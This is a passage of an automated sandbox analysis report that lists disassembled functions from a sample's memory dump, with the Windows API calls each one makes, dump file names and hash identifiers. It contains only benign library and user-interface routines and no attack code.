Instruction Fuzzy Hash: 8BD0A72510830E647D4836B06C5A0F92344BD51B703E00B45E330C53D3EE1D4407A01A

Function 007EDC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 007EDC73
DloadProtectSection.DELAYIMP ref: 007EDC8F

Part of subcall function 007EDE67: DloadObtainSection.DELAYIMP ref: 007EDE77

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: d9976379ff42ee254f4bc24cf84daeb2dadfaa4fb26cadcd8fce0c9c4e4a3da2
Instruction ID: e3a4b1c03eb82de590a9d65893bd4c23c260a23911b725577e12c6fcfe25cd80
Opcode Fuzzy Hash: d9976379ff42ee254f4bc24cf84daeb2dadfaa4fb26cadcd8fce0c9c4e4a3da2
Instruction Fuzzy Hash: DAD0C9701022C08EC231EB6A9D5A75D2271B74C789F641A01A116C75B0EBAC4C82CA66

Function 007D12E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 007D12FB
ShowWindow.USER32(00000000), ref: 007D1302

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: b9c57d7b26bdecc882f9bf3a480783279a3b6fad9ff7926b82cd435ea43fedfe
Instruction ID: 6bc647ad51ce7d160420573287918bcc398ebb209008c6035b3ab3114beb0e2c
Opcode Fuzzy Hash: b9c57d7b26bdecc882f9bf3a480783279a3b6fad9ff7926b82cd435ea43fedfe
Instruction Fuzzy Hash: B1C01232058200BECB020BB0ED09D2FBBA8BBE4212F05CD08B6A5C0060C23CC010DB11

Function 007D19A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D19AB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7fb45f882d86e3fff3cc3db5ef4c12a4fe8a44b9b504f0d5ef1d587fae843e21
Instruction ID: 5c95f1c98a2cd4b47195e4a56438fe1138c24390483331ac80bf9f50e839f32d
Opcode Fuzzy Hash: 7fb45f882d86e3fff3cc3db5ef4c12a4fe8a44b9b504f0d5ef1d587fae843e21
Instruction Fuzzy Hash: 3FC1A270A04244AFEF15CF68C498BA97BB5EF4A310F5840BBEC45DB386DB399944CB61

Function 007D3B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D3B42

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cac072b66403cf45271a981ca031236a9186c51d36ddabce035790f6134dd564
Instruction ID: af28aed8c85de2bb1cb8d6e95d248639dee8a03d2d2f9ceadef99c177d14a098
Opcode Fuzzy Hash: cac072b66403cf45271a981ca031236a9186c51d36ddabce035790f6134dd564
Instruction Fuzzy Hash: 2871C071204F44AEDB21DB70CC45AE7B7F9AF18301F44495FE5AB87282DA396A48CF51

Function 007D837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D8384

Part of subcall function 007D1380: __EH_prolog.LIBCMT ref: 007D1385
Part of subcall function 007D1380: new.LIBCMT ref: 007D13FE

Part of subcall function 007D19A6: __EH_prolog.LIBCMT ref: 007D19AB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: c7a733c0db98d3e07713348f5c0f547fe6a87aa03be9221c9ec151df61bff7cc
Instruction ID: a3b7cc2eee7d09eff5d814263dca8df3e164b02c3a02318ec80810c31ac5f2e2
Opcode Fuzzy Hash: c7a733c0db98d3e07713348f5c0f547fe6a87aa03be9221c9ec151df61bff7cc
Instruction Fuzzy Hash: 1C41C231840694DADF60DB60CC59BEA73B8AF54300F4444EBE58AA7293DF785EC8DB51

Function 007D1E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D1E05

Part of subcall function 007D3B3D: __EH_prolog.LIBCMT ref: 007D3B42

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 998da38c0596dd1d8d1d342169aabd405d0acc6026914d688a320be779066839
Instruction ID: 6abcf79a934f52c6567f00f83e29098ad0b5fe1c5e7153feaead71093829a0a0
Opcode Fuzzy Hash: 998da38c0596dd1d8d1d342169aabd405d0acc6026914d688a320be779066839
Instruction Fuzzy Hash: AC212672905148EECB11EFA9D9469EEBBF6BF58300B50016EE845A7351CB3A5E10CB60

Function 007EA7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007EA7C8

Part of subcall function 007D1380: __EH_prolog.LIBCMT ref: 007D1385
Part of subcall function 007D1380: new.LIBCMT ref: 007D13FE

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 959f65231c14147918d2d6a0234193364f1436d92e1434364bb6f1346db600e4
Instruction ID: f8f00d6dfff81bd8f289a2ee7460f2a13e947ee4207acf4aa8a3bb18f13304f6
Opcode Fuzzy Hash: 959f65231c14147918d2d6a0234193364f1436d92e1434364bb6f1346db600e4
Instruction Fuzzy Hash: 24216B71C05289EACF15DF95C9569EEB7B4EF19300F4004AAE809A7242DB396E06CB61

Function 007D92E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D92EB

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 83bd2d51ec10666dee31d80ee797b4bfaf7cc6ffb97bb289e06d4f8cfb5f33b2
Instruction ID: 461821e39f73b1293f317001db50ae5cd5560a61d3fde5ab0cddfbd0980e64bb
Opcode Fuzzy Hash: 83bd2d51ec10666dee31d80ee797b4bfaf7cc6ffb97bb289e06d4f8cfb5f33b2
Instruction Fuzzy Hash: 24118E73A10529EBCF26AEA8CC459EEB736EF88750F054116FA05A7391DA388D10C7A0

Function 007DAA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 007DAA9A

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction ID: 7b1e339da4986ca5214092e67300d272baf5d2f2d6cfe1c16b06f51420d39904
Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
Instruction Fuzzy Hash: 7AF08C30500B06AFDB30DE65C945616BBF8FB65320F20CA1BE496C2780E778E880C742

Function 007D5BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 007D5BDC

Part of subcall function 007DB07D: __EH_prolog.LIBCMT ref: 007DB082

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9c82357e86f39b9bdfd8b308046dc8670add8541c81ae8b695c34e04d947f556
Instruction ID: b42912083f2b82dd38a30eb6bee250cd85f1aa75d716400de5f64fb12ef29356
Opcode Fuzzy Hash: 9c82357e86f39b9bdfd8b308046dc8670add8541c81ae8b695c34e04d947f556
Instruction Fuzzy Hash: 9A016D34A05684DAC725F7A4C0593EDF7B49F5D700F40459EE85A53383CBB81B08C7A2

Function 007F8518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,007FC13D,00000000,?,007F67E2,?,00000008,?,007F89AD,?,?,?), ref: 007F854A

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ed2efb9f103d3634dc4d812c1404fbda4a7a9ef6f493f659dec874a1123c35a9
Instruction ID: 114f4f2f8c5dc3453ed5335b1ca3abeec16bb19725fc629de92ed22cc19a5b77
Opcode Fuzzy Hash: ed2efb9f103d3634dc4d812c1404fbda4a7a9ef6f493f659dec874a1123c35a9
Instruction Fuzzy Hash: 8DE0A02154412D9BEBA127695C05B7A278C9F817A0F150220BB14AB391CE288C1085A7

Function 007DA4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 007DA4F5

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 0ece0e823886070d803618663103b25e38da7a124f9cae818efd7d1d362e8671
Instruction ID: 933b021f0f3001d789601adb7d3e5c8de54a4d975a106f4a82f3557cb69f8ae5
Opcode Fuzzy Hash: 0ece0e823886070d803618663103b25e38da7a124f9cae818efd7d1d362e8671
Instruction Fuzzy Hash: 13F0E9310097C0FBCA225B7848087C67BB07F15331F04CA0AF1FD02291C27D14959723

Function 007E067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 007E06B1

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: 4d4e1fd50a3353e7f2332d70320ed6e8d3db2a96d3a42bf316092abbc1a17d4c
Instruction ID: 4ad50bbc45293c42e958d82a3baa20064fc4dc2a5833990141addad05940be18
Opcode Fuzzy Hash: 4d4e1fd50a3353e7f2332d70320ed6e8d3db2a96d3a42bf316092abbc1a17d4c
Instruction Fuzzy Hash: 00D012256061D0A5D621336AAC0F7FE1B1A6FCAB10F094067B54E576C6CF9E08C656E2

Function 007E9D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 007E9D81

Part of subcall function 007E9B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 007E9B30

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction ID: 2beabee848120866d25a96a4a3e56e812cc884bc448fa994e4006b31d7443230
Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
Instruction Fuzzy Hash: 04D0A73171624CFADF40FE768C0297E7BACEB08300F008025BE0886141EDB5DE10A261

Function 007D9989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,007D9887), ref: 007D9995

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8f7c0bfaff0d5287e3773fef44f9466333a6ffb9d42194040aa8471e7333c437
Instruction ID: 0ab88b749b819da366c894c59c4a62ebd721d42cb358c65e3978d0fa83d88831
Opcode Fuzzy Hash: 8f7c0bfaff0d5287e3773fef44f9466333a6ffb9d42194040aa8471e7333c437
Instruction Fuzzy Hash: DAD01231011540A58F6146354E1A0997775DBC3366B38D6A9D165C41A1D737D803F541

Function 007ED41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 007ED43F

Part of subcall function 007EAC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EAC85
Part of subcall function 007EAC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007EAC96
Part of subcall function 007EAC74: IsDialogMessageW.USER32(00070332,?), ref: 007EACAA
Part of subcall function 007EAC74: TranslateMessage.USER32(?), ref: 007EACB8
Part of subcall function 007EAC74: DispatchMessageW.USER32(?), ref: 007EACC2

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 82f323f85a66dd895a094cff72fc2531d775f6dcfb133e74181f4a369d3d65c8
Instruction ID: 3e5ae122505fef3feb0b131f690b65865ffd3cb006fb3ea9b71ca5437c72a7ba
Opcode Fuzzy Hash: 82f323f85a66dd895a094cff72fc2531d775f6dcfb133e74181f4a369d3d65c8
Instruction Fuzzy Hash: 2CD09E31144300FBD6122B51CE07F0F7AA6BB88B04F004954B345740B1CA66AD20AB16

Function 007ED8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 7e4fce47a58699832bcfe2943fe5f8a0fe32170897c9b42c630c07957f577b71
Instruction ID: 8fb7207d898cc7c38b9882ad7b2870ec31bcf171ab718a68c4bbac5380aec4a4
Opcode Fuzzy Hash: 7e4fce47a58699832bcfe2943fe5f8a0fe32170897c9b42c630c07957f577b71
Instruction Fuzzy Hash: 18B012B126E042EC315CA14B6D16D3A021CE4C8B10330401AB51DD02C0D4487D080431

Function 007ED8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000002.00000002.1746870778.00000000007D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746936091.0000000000803000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.000000000080E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000814000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1746959381.0000000000831000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1747089317.0000000000832000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_ry0bqfj0.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 8cea6e402e2360f69a5fe5a7cd546724f15c3003756d37f20fb58b460889738e
Instruction ID: d9ace1d6f595e2def31fb5d746beb78961d78c9cca9b91d899762b00ec45ea0a
Opcode Fuzzy Hash: 8cea6e402e2360f69a5fe5a7cd546724f15c3003756d37f20fb58b460889738e
Instruction Fuzzy Hash: C8B012B126E042EC315CA14A6E16D3A021CD4C8B10330401AB51DD02C0D4487E091431

Function 007ED8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 007ED8A3

Part of subcall function 007EDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 007EDFD6
Part of subcall function 007EDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 007EDFE7

Memory Dump Source

Source File: 00000002.00000002.1746892082.00000000007D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 007D0000, based on PE: true

